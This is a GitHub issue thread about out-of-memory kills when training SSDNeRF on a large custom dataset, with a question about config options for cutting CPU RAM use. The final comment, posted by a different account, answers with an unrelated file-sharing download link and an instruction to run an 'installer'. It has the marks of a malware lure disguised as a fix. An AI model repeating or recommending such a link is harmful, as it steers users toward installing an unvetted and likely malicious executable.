### ISSUE TITLE
OOM error

### ISSUE THREAD

**Issue by xiyichen** [Lakonik/SSDNeRF#45]
I am training SSDNeRF on a large custom dataset (~40k scenes) using 4 gpus with a total ram of 384GB. For each scene, I use ~40 training views. It always runs out of memory after thousands of iterations of training. I have tried to reduce workers_per_gpu to 1, but it's still not enough. I'm wondering if there's any other configs that I could change to further reduce RAM. Would it be helpful to set cache_size to 0, and use 16-bit and filesystem caching?

**Comment by xiyichen** [comment]
I always get an error "Detected 1 oom_kill event in StepId=xxx.batch. Some of the step tasks have been OOM Killed", which I believe is running out of CPU memory rather than GPU memory.

**Comment by Shadi201711** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
